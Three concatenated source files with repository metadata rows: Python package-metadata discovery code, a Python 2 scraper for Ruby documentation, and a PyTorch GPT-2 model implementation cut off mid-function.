            or self.read_text('')
        )
        return email_message_from_string(text)

    @property
    def version(self):
        """Return the 'Version' metadata for the distribution package."""
        return self.metadata['Version']

    @property
    def entry_points(self):
        # Parsed from the distribution's entry_points.txt (ini format).
        return EntryPoint._from_text(self.read_text('entry_points.txt'))

    @property
    def files(self):
        # RECORD (dist-info) is preferred; SOURCES.txt (egg-info) is fallback.
        # Returns None (falsy) when neither manifest is present.
        file_lines = self._read_files_distinfo() or self._read_files_egginfo()

        def make_file(name, hash=None, size_str=None):
            result = PackagePath(name)
            result.hash = FileHash(hash) if hash else None
            result.size = int(size_str) if size_str else None
            result.dist = self
            return result

        return file_lines and starmap(make_file, csv.reader(file_lines))

    def _read_files_distinfo(self):
        """
        Read the lines of RECORD
        """
        text = self.read_text('RECORD')
        return text and text.splitlines()

    def _read_files_egginfo(self):
        """
        SOURCES.txt might contain literal commas, so wrap each line
        in quotes.
        """
        text = self.read_text('SOURCES.txt')
        return text and map('"{}"'.format, text.splitlines())

    @property
    def requires(self):
        """Generated requirements specified for this Distribution"""
        return self._read_dist_info_reqs() or self._read_egg_info_reqs()

    def _read_dist_info_reqs(self):
        # metadata may carry multiple Requires-Dist values joined by newlines.
        spec = self.metadata['Requires-Dist']
        return spec and filter(None, spec.splitlines())

    def _read_egg_info_reqs(self):
        source = self.read_text('requires.txt')
        return source and self._deps_from_requires_text(source)

    @classmethod
    def _deps_from_requires_text(cls, source):
        # Group requires.txt lines by their [section] header, then rewrite
        # each section's deps as PEP 508-style environment markers.
        section_pairs = cls._read_sections(source.splitlines())
        sections = {
            section: list(map(operator.itemgetter('line'), results))
            for section, results in
            itertools.groupby(section_pairs, operator.itemgetter('section'))
        }
        return cls._convert_egg_info_reqs_to_simple_reqs(sections)

    @staticmethod
    def _read_sections(lines):
        # Yields dicts (via locals()) containing at least 'line' and the
        # current 'section' (None until the first [header] is seen).
        section = None
        for line in filter(None, lines):
            section_match = re.match(r'\[(.*)\]$', line)
            if section_match:
                section = section_match.group(1)
                continue
            yield locals()

    @staticmethod
    def _convert_egg_info_reqs_to_simple_reqs(sections):
        """
        Historically, setuptools would solicit and store 'extra'
        requirements, including those with environment markers,
        in separate sections. More modern tools expect each
        dependency to be defined separately, with any relevant
        extras and environment markers attached directly to that
        requirement. This method converts the former to the
        latter. See _test_deps_from_requires_text for an example.
        """
        def make_condition(name):
            return name and 'extra == "{name}"'.format(name=name)

        def parse_condition(section):
            # Section headers look like "extra:marker", "extra", or ":marker".
            section = section or ''
            extra, sep, markers = section.partition(':')
            if extra and markers:
                markers = '({markers})'.format(markers=markers)
            conditions = list(filter(None, [markers, make_condition(extra)]))
            return '; ' + ' and '.join(conditions) if conditions else ''

        for section, deps in sections.items():
            for dep in deps:
                yield dep + parse_condition(section)
class DistributionFinder(MetaPathFinder):
    """
    A MetaPathFinder capable of discovering installed distributions.
    """

    @abc.abstractmethod
    def find_distributions(self, name=None, path=None):
        """
        Find distributions.

        Return an iterable of all Distribution instances capable of
        loading the metadata for packages matching the ``name``
        (or all names if not supplied) along the paths in the list
        of directories ``path`` (defaults to sys.path).
        """
@install
class MetadataPathFinder(NullFinder, DistributionFinder):
    """A degenerate finder for distribution packages on the file system.

    This finder supplies only a find_distributions() method for versions
    of Python that do not have a PathFinder find_distributions().
    """

    def find_distributions(self, name=None, path=None):
        """
        Find distributions.

        Return an iterable of all Distribution instances capable of
        loading the metadata for packages matching the ``name``
        (or all names if not supplied) along the paths in the list
        of directories ``path`` (defaults to sys.path).
        """
        if path is None:
            path = sys.path
        # None means "any name"; otherwise match the literal name only.
        pattern = '.*' if name is None else re.escape(name)
        found = self._search_paths(pattern, path)
        return map(PathDistribution, found)

    @classmethod
    def _search_paths(cls, pattern, paths):
        """Find metadata directories in paths heuristically."""
        return itertools.chain.from_iterable(
            cls._search_path(path, pattern)
            for path in map(cls._switch_path, paths)
        )

    @staticmethod
    def _switch_path(path):
        # Try zipp.Path first so zip-file sys.path entries can be traversed
        # like directories; fall back to a plain filesystem path.
        # NOTE(review): PYPY_OPEN_BUG presumably works around a PyPy open()
        # issue (see _compat) — confirm before changing.
        if not PYPY_OPEN_BUG or os.path.isfile(path):  # pragma: no branch
            with suppress(Exception):
                return zipp.Path(path)
        return pathlib.Path(path)

    @classmethod
    def _matches_info(cls, normalized, item):
        # Matches "<name>[-<version>].dist-info" / ".egg-info" entry names.
        template = r'{pattern}(-.*)?\.(dist|egg)-info'
        manifest = template.format(pattern=normalized)
        return re.match(manifest, item.name, flags=re.IGNORECASE)

    @classmethod
    def _matches_legacy(cls, normalized, item):
        # Matches legacy "<name>-<version>.egg/EGG-INFO" layouts.
        template = r'{pattern}-.*\.egg[\\/]EGG-INFO'
        manifest = template.format(pattern=normalized)
        return re.search(manifest, str(item), flags=re.IGNORECASE)

    @classmethod
    def _search_path(cls, root, pattern):
        if not root.is_dir():
            return ()
        # Dashes and underscores are treated as equivalent in names.
        normalized = pattern.replace('-', '_')
        return (item for item in root.iterdir()
                if cls._matches_info(normalized, item)
                or cls._matches_legacy(normalized, item))
class PathDistribution(Distribution):
    def __init__(self, path):
        """Construct a distribution from a path to the metadata directory."""
        self._path = path

    def read_text(self, filename):
        # Any unreadable/missing metadata file is reported as "not present"
        # (None), per the Distribution.read_text contract.  KeyError covers
        # zip-backed paths — presumably zipp; confirm against _switch_path.
        with suppress(FileNotFoundError, IsADirectoryError, KeyError,
                      NotADirectoryError, PermissionError):
            return self._path.joinpath(filename).read_text(encoding='utf-8')
    read_text.__doc__ = Distribution.read_text.__doc__

    def locate_file(self, path):
        # Metadata dir sits inside the site dir; package files are siblings.
        return self._path.parent / path
def distribution(package):
    """Get the ``Distribution`` instance for the given package.

    :param package: The name of the package as a string.
    :return: A ``Distribution`` instance (or subclass thereof).
    """
    return Distribution.from_name(package)
def distributions():
    """Get all ``Distribution`` instances in the current environment.

    :return: An iterable of ``Distribution`` instances.
    """
    return Distribution.discover()
def metadata(package):
    """Get the metadata for the package.

    :param package: The name of the distribution package to query.
    :return: An email.Message containing the parsed metadata.
    """
    return Distribution.from_name(package).metadata
def version(package):
    """Get the version string for the named package.

    :param package: The name of the distribution package to query.
    :return: The version string for the package as defined in the package's
        "Version" metadata key.
    """
    return distribution(package).version
def entry_points():
    """Return EntryPoint objects for all installed packages.

    :return: mapping of entry-point group name to a tuple of EntryPoints.
    """
    all_eps = itertools.chain.from_iterable(
        dist.entry_points for dist in distributions())
    group_of = operator.attrgetter('group')
    # groupby requires its input pre-sorted by the same key.
    return {
        group: tuple(members)
        for group, members in itertools.groupby(sorted(all_eps, key=group_of), group_of)
    }
def files(package):
    """Return the PackagePath entries recorded for the named package,
    or None when no file manifest (RECORD / SOURCES.txt) is available."""
    return distribution(package).files
def requires(package):
    """
    Return a list of requirements for the indicated distribution.

    :return: An iterator of requirements, suitable for
        packaging.requirement.Requirement.
    """
    return distribution(package).requires
# Resolve this package's own version through its installed metadata.
__version__ = version(__name__)
| 30.784969
| 79
| 0.63624
|
794b2ac278a7f4a1eaf1963e0a8790a379fb5fbe
| 1,966
|
py
|
Python
|
share/UNCLEAN/parse_ruby.py
|
racker/zeroclickinfo-fathead
|
600fdf04fbf47b4035cc5451f245c87979446754
|
[
"Apache-2.0"
] | 1
|
2021-01-05T16:48:23.000Z
|
2021-01-05T16:48:23.000Z
|
share/UNCLEAN/parse_ruby.py
|
yanirs/zeroclickinfo-fathead
|
c06003560ef3368da5857df301938aad549a7d6b
|
[
"Apache-2.0"
] | null | null | null |
share/UNCLEAN/parse_ruby.py
|
yanirs/zeroclickinfo-fathead
|
c06003560ef3368da5857df301938aad549a7d6b
|
[
"Apache-2.0"
] | 1
|
2016-06-12T06:12:02.000Z
|
2016-06-12T06:12:02.000Z
|
# Python 2 scraper: extracts name/description entries from downloaded Ruby
# documentation pages for a DuckDuckGo fathead, emitting TSV or SQL.
from BeautifulSoup import BeautifulSoup
import re
import os
import sys
import string

# Strips any HTML open/close tags.
openclosetags = re.compile('''<.*?>|</.*?>''',re.DOTALL)

files = []

# Collect top-level ruby doc pages (names containing '_' are skipped).
for file in os.listdir('./docs/ruby/'):
  if '_' not in file:
    files.append('./docs/ruby/%s'%(file))

for file in files:
  filecontents = ''
  filecontents = open(file).read()
  # Drop non-printable bytes before parsing.
  filecontents = ''.join(filter(lambda x:x in string.printable, filecontents))

  soup = BeautifulSoup(filecontents)

  name = soup.findAll(attrs={"class":"class-name-in-header"})[0].string
  print file
  desc = ''
  if len(soup.findAll(attrs={"id":"description"})) != 0:
    t = soup.findAll(attrs={"id":"description"})[0].findAll('p')
    # Heuristic: skip a too-short first paragraph in favor of the second.
    if len(str(t[0])) > 20:
      desc = openclosetags.sub('',str(t[0]))
    else:
      desc = openclosetags.sub('',str(t[1]))
  print desc
  print
  continue
  # NOTE(review): everything below this unconditional `continue` is dead
  # code, apparently left over from the jQuery parser this script was
  # copied from (it builds api.jquery.com URLs and references an undefined
  # `findjqueryscript` regex) — confirm and remove.
  if len(t) == 0:
    #print file # dont want these ones
    continue
  t = t[0]
  name = t.findAll('h1')[0].string
  desc = openclosetags.sub('',str(t.findAll(attrs={"class":"desc"})[0]).replace("<strong>Description: </strong>",""))
  try:
    desc = "%s %s"%(desc,openclosetags.sub('',str(t.findAll(attrs={"class":"longdesc"})[0].findAll('p')[0])))
  except:
    pass

  synopsis = ''
  try:
    synopsis = openclosetags.sub('',str(t.findAll(attrs={"id":"example-0"})[0].findAll('pre')[0]))
    synopsis = findjqueryscript.findall(synopsis)[0]
  except:
    pass

  url = "http://api.jquery.com/%s/"%(file.replace("./docs/jquery/","").replace(".html","").replace(".htm",""))

  if len(sys.argv) == 1 or sys.argv[1].lower() == 'tsv':
    print "%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s"%(name,'',url,desc,'','','jquery','en')
  if sys.argv[1].lower() == 'sql':
    print '''INSERT INTO functions (`id`, `name`, `namespace`, `url`, `description`, `synopsis`, `detail`, `type`, `lang`) VALUES (NULL, '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');'''%(name,'',url,desc.replace("'","''"),synopsis.replace("'","''"),'','jquery','en')
| 30.71875
| 269
| 0.589013
|
794b2af3ce265c1b724eb6e899cc24752b9cff73
| 34,371
|
py
|
Python
|
model/torch_gpt2.py
|
kimhyoil/KoGPT2_Ai_Eassay
|
da7d160f6815dc8ec3dfd635495978409c2a897c
|
[
"MIT"
] | 77
|
2020-04-16T01:42:39.000Z
|
2022-03-09T00:51:23.000Z
|
model/torch_gpt2.py
|
kimhyoil/KoGPT2_Ai_Eassay
|
da7d160f6815dc8ec3dfd635495978409c2a897c
|
[
"MIT"
] | 9
|
2020-04-21T12:45:22.000Z
|
2021-01-29T06:17:19.000Z
|
model/torch_gpt2.py
|
kimhyoil/KoGPT2_Ai_Eassay
|
da7d160f6815dc8ec3dfd635495978409c2a897c
|
[
"MIT"
] | 20
|
2020-04-19T20:56:18.000Z
|
2022-03-09T00:53:20.000Z
|
# coding=utf-8
# Copyright 2018 The OpenAI Team Authors and HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch OpenAI GPT-2 model."""
import logging
import math
import os
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss
from torch.nn.functional import gelu
from transformers.configuration_gpt2 import GPT2Config
from transformers.file_utils import add_start_docstrings
from transformers.modeling_utils import Conv1D, PreTrainedModel, SequenceSummary, prune_conv1d_layer
logger = logging.getLogger(__name__)

# Shortcut-name -> S3 URL map for the published pretrained GPT-2 weights.
GPT2_PRETRAINED_MODEL_ARCHIVE_MAP = {
    "gpt2": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-pytorch_model.bin",
    "gpt2-medium": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-medium-pytorch_model.bin",
    "gpt2-large": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-large-pytorch_model.bin",
    "gpt2-xl": "https://s3.amazonaws.com/models.huggingface.co/bert/gpt2-xl-pytorch_model.bin",
    "distilgpt2": "https://s3.amazonaws.com/models.huggingface.co/bert/distilgpt2-pytorch_model.bin",
}
def load_tf_weights_in_gpt2(model, config, gpt2_checkpoint_path):
    """ Load tf checkpoints in a pytorch model
    """
    try:
        import re
        import tensorflow as tf
    except ImportError:
        logger.error(
            "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
            "https://www.tensorflow.org/install/ for installation instructions."
        )
        raise
    tf_path = os.path.abspath(gpt2_checkpoint_path)
    logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
    # Load weights from TF model
    init_vars = tf.train.list_variables(tf_path)
    names = []
    arrays = []
    for name, shape in init_vars:
        logger.info("Loading TF weight {} with shape {}".format(name, shape))
        array = tf.train.load_variable(tf_path, name)
        names.append(name)
        arrays.append(array.squeeze())

    for name, array in zip(names, arrays):
        name = name[6:]  # skip "model/"
        name = name.split("/")
        pointer = model
        # Walk the '/'-separated TF variable path down the PyTorch module tree.
        for m_name in name:
            if re.fullmatch(r"[A-Za-z]+\d+", m_name):
                # e.g. "h0" -> attribute "h" indexed at 0.
                scope_names = re.split(r"(\d+)", m_name)
            else:
                scope_names = [m_name]
            # TF scope names map onto PyTorch parameter attributes.
            if scope_names[0] == "w" or scope_names[0] == "g":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "b":
                pointer = getattr(pointer, "bias")
            elif scope_names[0] == "wpe" or scope_names[0] == "wte":
                pointer = getattr(pointer, scope_names[0])
                pointer = getattr(pointer, "weight")
            else:
                pointer = getattr(pointer, scope_names[0])
            if len(scope_names) >= 2:
                num = int(scope_names[1])
                pointer = pointer[num]
        try:
            # Shapes must agree exactly before copying the data in place.
            assert pointer.shape == array.shape
        except AssertionError as e:
            e.args += (pointer.shape, array.shape)
            raise
        logger.info("Initialize PyTorch weight {}".format(name))
        pointer.data = torch.from_numpy(array)
    return model
class Attention(nn.Module):
    """Multi-head causal self-attention used by every GPT-2 block.

    A single Conv1D (``c_attn``) produces query/key/value jointly; scores are
    masked with a fixed lower-triangular buffer so each position can only
    attend to itself and earlier positions, then projected back via ``c_proj``.
    """

    def __init__(self, nx, n_ctx, config, scale=False):
        super().__init__()
        self.output_attentions = config.output_attentions

        n_state = nx  # in Attention: n_state=768 (nx=n_embd)
        # [switch nx => n_state from Block to Attention to keep identical to TF implem]
        assert n_state % config.n_head == 0
        # Causal mask of shape (1, 1, n_ctx, n_ctx): ones on and below the diagonal,
        # shaped for broadcasting over the (batch, head) dimensions.
        self.register_buffer("bias", torch.tril(torch.ones(n_ctx, n_ctx)).view(1, 1, n_ctx, n_ctx))
        self.n_head = config.n_head
        self.split_size = n_state
        self.scale = scale

        # c_attn projects to 3 * n_state so q, k, v can be split off in one pass.
        self.c_attn = Conv1D(n_state * 3, nx)
        self.c_proj = Conv1D(n_state, nx)
        self.attn_dropout = nn.Dropout(config.attn_pdrop)
        self.resid_dropout = nn.Dropout(config.resid_pdrop)
        self.pruned_heads = set()

    def prune_heads(self, heads):
        """Remove the given attention heads in-place, shrinking c_attn / c_proj."""
        if len(heads) == 0:
            return
        mask = torch.ones(self.n_head, self.split_size // self.n_head)
        heads = set(heads) - self.pruned_heads  # Convert to set and remove already pruned heads
        for head in heads:
            # Compute how many pruned heads are before the head and move the index accordingly
            head = head - sum(1 if h < head else 0 for h in self.pruned_heads)
            mask[head] = 0
        mask = mask.view(-1).contiguous().eq(1)
        index = torch.arange(len(mask))[mask].long()
        # q, k and v live side by side in c_attn's output, so the kept column
        # indices are repeated three times, offset by split_size.
        index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])

        # Prune conv1d layers
        self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
        self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)

        # Update hyper params
        self.split_size = (self.split_size // self.n_head) * (self.n_head - len(heads))
        self.n_head = self.n_head - len(heads)
        self.pruned_heads = self.pruned_heads.union(heads)

    def _attn(self, q, k, v, attention_mask=None, head_mask=None):
        """Scaled dot-product attention with the causal mask applied."""
        w = torch.matmul(q, k)
        if self.scale:
            w = w / math.sqrt(v.size(-1))
        nd, ns = w.size(-2), w.size(-1)
        # Slice the causal mask to the current query (nd) / key (ns) lengths;
        # masked positions get a large negative score so softmax zeroes them.
        b = self.bias[:, :, ns - nd : ns, :ns]
        w = w * b - 1e4 * (1 - b)

        if attention_mask is not None:
            # Apply the (additive) padding attention mask
            w = w + attention_mask

        w = nn.Softmax(dim=-1)(w)
        w = self.attn_dropout(w)

        # Mask heads if we want to
        if head_mask is not None:
            w = w * head_mask

        outputs = [torch.matmul(w, v)]
        if self.output_attentions:
            outputs.append(w)
        return outputs

    def merge_heads(self, x):
        # (batch, head, seq_length, head_features) -> (batch, seq_length, head * head_features)
        x = x.permute(0, 2, 1, 3).contiguous()
        new_x_shape = x.size()[:-2] + (x.size(-2) * x.size(-1),)
        return x.view(*new_x_shape)  # in Tensorflow implem: fct merge_states

    def split_heads(self, x, k=False):
        # (batch, seq_length, n_state) -> per-head layout; keys come back
        # pre-transposed so _attn can matmul q @ k directly.
        new_x_shape = x.size()[:-1] + (self.n_head, x.size(-1) // self.n_head)
        x = x.view(*new_x_shape)  # in Tensorflow implem: fct split_states
        if k:
            return x.permute(0, 2, 3, 1)  # (batch, head, head_features, seq_length)
        else:
            return x.permute(0, 2, 1, 3)  # (batch, head, seq_length, head_features)

    def forward(self, x, layer_past=None, attention_mask=None, head_mask=None):
        """Run attention over x, optionally reusing cached keys/values (layer_past)."""
        x = self.c_attn(x)
        query, key, value = x.split(self.split_size, dim=2)
        query = self.split_heads(query)
        key = self.split_heads(key, k=True)
        value = self.split_heads(value)
        if layer_past is not None:
            # Prepend cached keys/values so incremental decoding can attend to past tokens.
            past_key, past_value = layer_past[0].transpose(-2, -1), layer_past[1]  # transpose back cf below
            key = torch.cat((past_key, key), dim=-1)
            value = torch.cat((past_value, value), dim=-2)
        present = torch.stack((key.transpose(-2, -1), value))  # transpose to have same shapes for stacking

        attn_outputs = self._attn(query, key, value, attention_mask, head_mask)
        a = attn_outputs[0]

        a = self.merge_heads(a)
        a = self.c_proj(a)
        a = self.resid_dropout(a)

        outputs = [a, present] + attn_outputs[1:]
        return outputs  # a, present, (attentions)
class MLP(nn.Module):
    """Position-wise feed-forward block: expand, GELU, contract, dropout.

    ``n_state`` is the inner (expanded) width; GPT-2 uses 4 * n_embd.
    """

    def __init__(self, n_state, config):
        super().__init__()
        embed_dim = config.n_embd
        self.c_fc = Conv1D(n_state, embed_dim)
        self.c_proj = Conv1D(embed_dim, n_state)
        self.act = gelu
        self.dropout = nn.Dropout(config.resid_pdrop)

    def forward(self, x):
        """Apply the two-layer MLP with GELU activation and residual dropout."""
        hidden = self.c_fc(x)
        hidden = self.act(hidden)
        projected = self.c_proj(hidden)
        return self.dropout(projected)
class Block(nn.Module):
    """One GPT-2 transformer layer: pre-LayerNorm attention and pre-LayerNorm
    MLP, each wrapped in a residual connection.
    """

    def __init__(self, n_ctx, config, scale=False):
        super().__init__()
        embed_dim = config.n_embd
        self.ln_1 = nn.LayerNorm(embed_dim, eps=config.layer_norm_epsilon)
        self.attn = Attention(embed_dim, n_ctx, config, scale)
        self.ln_2 = nn.LayerNorm(embed_dim, eps=config.layer_norm_epsilon)
        self.mlp = MLP(4 * embed_dim, config)

    def forward(self, x, layer_past=None, attention_mask=None, head_mask=None):
        """Return [hidden_states, present, (attentions)] for this layer."""
        attn_outputs = self.attn(
            self.ln_1(x), layer_past=layer_past, attention_mask=attention_mask, head_mask=head_mask
        )
        # Residual connection around attention.
        x = x + attn_outputs[0]
        # Residual connection around the feed-forward block.
        x = x + self.mlp(self.ln_2(x))
        return [x] + attn_outputs[1:]  # x, present, (attentions)
class GPT2PreTrainedModel(PreTrainedModel):
    """ An abstract class to handle weights initialization and
        a simple interface for downloading and loading pretrained models.
    """

    config_class = GPT2Config
    pretrained_model_archive_map = GPT2_PRETRAINED_MODEL_ARCHIVE_MAP
    load_tf_weights = load_tf_weights_in_gpt2
    base_model_prefix = "transformer"

    def __init__(self, *inputs, **kwargs):
        super().__init__(*inputs, **kwargs)

    def _init_weights(self, module):
        """ Initialize the weights of a single submodule.

        Linear-like layers get a normal(0, initializer_range) weight and a
        zero bias; LayerNorm gets unit weight and zero bias.
        """
        if isinstance(module, (nn.Linear, nn.Embedding, Conv1D)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            has_bias = isinstance(module, (nn.Linear, Conv1D)) and module.bias is not None
            if has_bias:
                module.bias.data.zero_()
        elif isinstance(module, nn.LayerNorm):
            module.weight.data.fill_(1.0)
            module.bias.data.zero_()
GPT2_START_DOCSTRING = r""" OpenAI GPT-2 model was proposed in
`Language Models are Unsupervised Multitask Learners`_
by Alec Radford*, Jeffrey Wu*, Rewon Child, David Luan, Dario Amodei** and Ilya Sutskever**.
It's a causal (unidirectional) transformer pre-trained using language modeling on a very large
corpus of ~40 GB of text data.
This model is a PyTorch `torch.nn.Module`_ sub-class. Use it as a regular PyTorch Module and
refer to the PyTorch documentation for all matter related to general usage and behavior.
.. _`Language Models are Unsupervised Multitask Learners`:
https://openai.com/blog/better-language-models/
.. _`torch.nn.Module`:
https://pytorch.org/docs/stable/nn.html#module
Parameters:
config (:class:`~transformers.GPT2Config`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the configuration.
Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
GPT2_INPUTS_DOCSTRING = r""" Inputs:
**input_ids**: ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
Indices of input sequence tokens in the vocabulary.
GPT-2 is a model with absolute position embeddings so it's usually advised to pad the inputs on
the right rather than the left.
Indices can be obtained using :class:`transformers.GPT2Tokenizer`.
See :func:`transformers.PreTrainedTokenizer.encode` and
:func:`transformers.PreTrainedTokenizer.convert_tokens_to_ids` for details.
**past**:
list of ``torch.FloatTensor`` (one for each layer):
that contains pre-computed hidden-states (key and values in the attention blocks) as computed by the model
(see `past` output below). Can be used to speed up sequential decoding. The token ids which have their past given to this model
should not be passed as input ids as they have already been computed.
**attention_mask**: (`optional`) ``torch.FloatTensor`` of shape ``(batch_size, sequence_length)``:
Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
**token_type_ids**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
A parallel sequence of tokens (can be used to indicate various portions of the inputs).
The embeddings from these tokens will be summed with the respective token embeddings.
Indices are selected in the vocabulary (unlike BERT which has a specific vocabulary for segment indices).
**position_ids**: (`optional`) ``torch.LongTensor`` of shape ``(batch_size, sequence_length)``:
Indices of positions of each input sequence tokens in the position embeddings.
Selected in the range ``[0, config.max_position_embeddings - 1]``.
**head_mask**: (`optional`) ``torch.FloatTensor`` of shape ``(num_heads,)`` or ``(num_layers, num_heads)``:
Mask to nullify selected heads of the self-attention modules.
Mask values selected in ``[0, 1]``:
``1`` indicates the head is **not masked**, ``0`` indicates the head is **masked**.
**inputs_embeds**: (`optional`) ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, embedding_dim)``:
Optionally, instead of passing ``input_ids`` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
"""
@add_start_docstrings(
    "The bare GPT2 Model transformer outputting raw hidden-states without any specific head on top.",
    GPT2_START_DOCSTRING,
    GPT2_INPUTS_DOCSTRING,
)
class GPT2Model(GPT2PreTrainedModel):
    r"""
    Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
        **last_hidden_state**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, hidden_size)``
            Sequence of hidden-states at the last layer of the model.
        **past**:
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(2, batch_size, num_heads, sequence_length, embed_size_per_head)``:
            that contains pre-computed hidden-states (key and values in the attention blocks).
            Can be used (see `past` input) to speed up sequential decoding. The token ids which have their past given to this model
            should not be passed as input ids as they have already been computed.
        **hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
            list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
            of shape ``(batch_size, sequence_length, hidden_size)``:
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        **attentions**: (`optional`, returned when ``config.output_attentions=True``)
            list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.

    Examples::

        tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
        model = GPT2Model.from_pretrained('gpt2')
        input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)  # Batch size 1
        outputs = model(input_ids)
        last_hidden_states = outputs[0]  # The last hidden-state is the first element of the output tuple

    """

    def __init__(self, config):
        super().__init__(config)
        self.output_hidden_states = config.output_hidden_states
        self.output_attentions = config.output_attentions
        self.output_past = config.output_past

        # wte: token embeddings; wpe: learned absolute position embeddings.
        self.wte = nn.Embedding(config.vocab_size, config.n_embd)
        self.wpe = nn.Embedding(config.n_positions, config.n_embd)
        self.drop = nn.Dropout(config.embd_pdrop)
        self.h = nn.ModuleList([Block(config.n_ctx, config, scale=True) for _ in range(config.n_layer)])
        self.ln_f = nn.LayerNorm(config.n_embd, eps=config.layer_norm_epsilon)

        self.init_weights()

    def get_input_embeddings(self):
        """Return the token embedding module (used for weight tying)."""
        return self.wte

    def set_input_embeddings(self, new_embeddings):
        """Replace the token embedding module."""
        self.wte = new_embeddings

    def _prune_heads(self, heads_to_prune):
        """ Prunes heads of the model.
            heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
        """
        for layer, heads in heads_to_prune.items():
            self.h[layer].attn.prune_heads(heads)

    def forward(
        self,
        input_ids=None,
        past=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
    ):
        # Exactly one of input_ids / inputs_embeds must be provided.
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            input_shape = input_ids.size()
            input_ids = input_ids.view(-1, input_shape[-1])
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")

        if token_type_ids is not None:
            token_type_ids = token_type_ids.view(-1, input_shape[-1])
        if position_ids is not None:
            position_ids = position_ids.view(-1, input_shape[-1])

        # past_length offsets the position ids during incremental decoding so
        # new tokens get positions continuing from the cached sequence.
        if past is None:
            past_length = 0
            past = [None] * len(self.h)
        else:
            past_length = past[0][0].size(-2)
        if position_ids is None:
            device = input_ids.device if input_ids is not None else inputs_embeds.device
            position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
            position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])

        # Attention mask.
        if attention_mask is not None:
            attention_mask = attention_mask.view(-1, input_shape[-1])
            # We create a 3D attention mask from a 2D tensor mask.
            # Sizes are [batch_size, 1, 1, to_seq_length]
            # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
            # this attention mask is more simple than the triangular masking of causal attention
            # used in OpenAI GPT, we just need to prepare the broadcast dimension here.
            attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)

            # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
            # masked positions, this operation will create a tensor which is 0.0 for
            # positions we want to attend and -10000.0 for masked positions.
            # Since we are adding it to the raw scores before the softmax, this is
            # effectively the same as removing these entirely.
            attention_mask = attention_mask.to(dtype=next(self.parameters()).dtype)  # fp16 compatibility
            attention_mask = (1.0 - attention_mask) * -10000.0

        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # head_mask has shape n_layer x batch x n_heads x N x N
        if head_mask is not None:
            if head_mask.dim() == 1:
                head_mask = head_mask.unsqueeze(0).unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
                head_mask = head_mask.expand(self.config.n_layer, -1, -1, -1, -1)
            elif head_mask.dim() == 2:
                head_mask = (
                    head_mask.unsqueeze(1).unsqueeze(-1).unsqueeze(-1)
                )  # We can specify head_mask for each layer
            head_mask = head_mask.to(
                dtype=next(self.parameters()).dtype
            )  # switch to float if need + fp16 compatibility
        else:
            head_mask = [None] * self.config.n_layer

        # Sum token, position and (optional) token-type embeddings.
        if inputs_embeds is None:
            inputs_embeds = self.wte(input_ids)
        position_embeds = self.wpe(position_ids)
        if token_type_ids is not None:
            token_type_embeds = self.wte(token_type_ids)
        else:
            token_type_embeds = 0
        hidden_states = inputs_embeds + position_embeds + token_type_embeds
        hidden_states = self.drop(hidden_states)

        output_shape = input_shape + (hidden_states.size(-1),)

        # Run every transformer block, collecting caches / hidden states /
        # attentions as requested by the config flags.
        presents = ()
        all_attentions = []
        all_hidden_states = ()
        for i, (block, layer_past) in enumerate(zip(self.h, past)):
            if self.output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states.view(*output_shape),)

            outputs = block(
